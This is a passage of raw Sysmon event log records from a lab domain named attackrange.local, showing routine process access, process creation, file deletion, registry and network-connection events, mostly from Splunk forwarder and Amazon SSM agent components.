Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4325MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000982267Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:29.131{69CF5F33-8EBC-6151-3C7A-00000000FD01}3128792C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057914Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:30.913{5EBD8912-8EBE-6151-DC00-00000000FD01}44525812C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057913Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:30.678{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8EBE-6151-DC00-00000000FD01}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057912Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:30.678{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057911Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:30.678{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057910Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:30.678{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057909Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:30.678{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057908Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:30.678{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8EBE-6151-DC00-00000000FD01}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057907Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:30.678{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8EBE-6151-DC00-00000000FD01}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057906Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:30.680{5EBD8912-8EBE-6151-DC00-00000000FD01}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001057905Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:30.600{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC3C9606AE6649625B4E51AFA93A64CE,SHA256=CF37794AC8E896AA70C04FCC9588A84F4792199A3649B9D0E20604DA308B04ED,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982272Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.514{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-54381-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000982271Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:30.648{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AC1E5E2B3400282C2DDCC824B696C29,SHA256=B29CCDD4A6A01CCDD088CA3BFC3CD29356BA7ACE6C99D7E3867FDB2B32744461,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057904Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:30.509{5EBD8912-8CD0-6151-2F00-00000000FD01}2544NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210927092016-008MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057903Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:30.211{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2CB6C8043875AC013E5E7B838B9D51A5,SHA256=EE97AD340B14E22F94F0B55F8480FFF057D00630F5E99EF322C9D2466384C97D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057902Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:27.736{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.78-64493-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001057901Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:27.558{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-53582-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057928Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:31.681{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DBA80F32B2BCD8231411F8C531CBE459,SHA256=B759C10B78493B4C8433971671DE35C01209E06347191EABCB63B74CCE14AC24,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057927Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:31.681{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8EBF-6151-DD00-00000000FD01}3680C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057926Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:31.681{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057925Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:31.681{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057924Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:31.681{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057923Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:31.681{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057922Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:31.681{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8EBF-6151-DD00-00000000FD01}3680C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057921Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:31.681{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8EBF-6151-DD00-00000000FD01}3680C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057920Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:31.682{5EBD8912-8EBF-6151-DD00-00000000FD01}3680C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001057919Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:31.619{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21B373372DB599BBC807D8AB8597F7E3,SHA256=CEE7B50AA7436623A76A832CBC77BA57E6701BAE0B6790880584D283F21DAD21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982274Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:31.804{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B2DFC7D1C9FE703B5563A0FEC01CC4D,SHA256=81ACA72D2B79A664675A77DD21526DF2155208D2104BFA1E85E38CF871F2138B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057918Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:29.675{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54320-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001057917Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:29.675{5EBD8912-8CD0-6151-2800-00000000FD01}2200C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54320-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001057916Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:28.961{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.78-51655-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001057915Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:28.616{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.78-58990-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000982273Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:31.570{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=102163FA27E72B2021546AD2AACF1ABC,SHA256=93737F9D14C245E052528BC69E732425C21D5F25E8171FE27E79E0C51321AD51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057931Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:32.681{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9F0B989F5E852324D47D988B0908BE78,SHA256=3D7DC483BAB914B47DA161AB0DCADC25DED70A67ACE694617E690235E555E91E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057930Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:32.619{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F4441FF55BFEC8C1A93156B6B1B4EE4,SHA256=3B542BC854FE7B316C3301DB7FD5F0ABE15A804EB6EE580E411AD11F3B029285,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982276Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:32.820{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5843C5DDDBC4CB55D06A17902B39E9E4,SHA256=265A3C72C4103F3525F7F29FE3822E4425F18B90537DCE5EBDF562B15EE15AD7,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001057929Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:28:32.400{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b382-0x09e78ba9) 23542300x8000000000000000982275Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:32.679{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=0D24928078BEF3F6B8032382550D0193,SHA256=47651A2D2A040F32C6C78AB109A749F5EC91DB40C371D79F3587B015BE982545,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982277Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:33.835{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C7A00C057AEBAA065F67C8EB549ECB5,SHA256=117118F5ED0C529B788C50FEAA75063B53BE4972D2A273D9D6A41200F13E633C,IMPHASH=00000000000000000000000000000000falsetrue 